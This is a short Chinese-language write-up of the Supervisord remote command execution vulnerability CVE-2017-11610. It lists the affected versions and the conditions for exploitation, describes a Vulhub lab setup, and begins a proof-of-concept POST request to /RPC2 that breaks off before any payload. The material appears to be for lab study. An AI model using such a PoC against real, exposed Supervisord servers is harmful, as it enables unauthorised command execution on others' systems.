Supervisord 远程命令执行漏洞(CVE-2017-11610)
一、漏洞介绍
Supervisord是一款用Python语言开发的管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。
Supervisord曾曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610)。通过POST请求向Supervisord管理界面提交恶意数据,可以获取服务器操作权限,带来严重的安全风险。
利用条件:
Supervisor版本在受影响范围内
Supervisor 9001管理端口可以被外网访问
Supervisor未配置密码或使用弱密码
漏洞影响范围:
Supervisor version 3.1.2
Supervisor version 3.3.2
二、漏洞危害
利用该漏洞远程POST请求,向Supervisord管理界面提交恶意数据,可以获取服务器操作权限。
三、漏洞验证
环境搭建:
实验环境 | 系统 | IP地址 |
---|---|---|
攻击机 | win10 | 192.168.18.7 |
靶机 | win10 | 192.168.18.7:9001 |
这里我使用Vulhub搭建环境:
docker-compose build
docker-compose up -d
环境启动后,访问http://your-ip:9001
即可查看Supervisord的页面。
PoC1(无回显):
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: